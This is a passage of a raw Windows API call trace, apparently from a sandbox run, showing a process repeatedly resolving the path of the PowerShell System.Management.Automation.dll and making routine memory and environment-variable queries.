0x74 [0103.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0104.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0104.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0104.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0104.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0104.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0104.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0104.060] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0104.061] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0104.061] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.061] CoTaskMemFree (pv=0x1b7401c0) [0104.062] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0104.072] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0104.072] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.072] CoTaskMemFree (pv=0x1b7401c0) [0104.073] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0104.073] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.073] CoTaskMemFree (pv=0x1b7401c0) [0104.073] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0104.073] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.073] CoTaskMemFree (pv=0x1b7401c0) [0104.074] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0104.074] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.075] CoTaskMemFree (pv=0x1b7401c0) [0104.075] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0104.075] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.075] CoTaskMemFree (pv=0x1b7401c0) [0104.076] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0104.076] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.076] CoTaskMemFree (pv=0x1b7401c0) [0104.077] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0104.078] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0104.125] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0104.131] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0104.131] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.131] CoTaskMemFree (pv=0x1b7401c0) [0104.233] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b7402d0 [0104.235] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b7403e0 [0104.450] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.187] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.188] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.189] VirtualQuery (in: lpAddress=0x1a9f00, lpBuffer=0x1aadc0, dwLength=0x30 | out: lpBuffer=0x1aadc0*(BaseAddress=0x1a9000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x7000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.216] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.216] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.217] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.218] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.218] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.219] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.220] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.220] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.221] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, 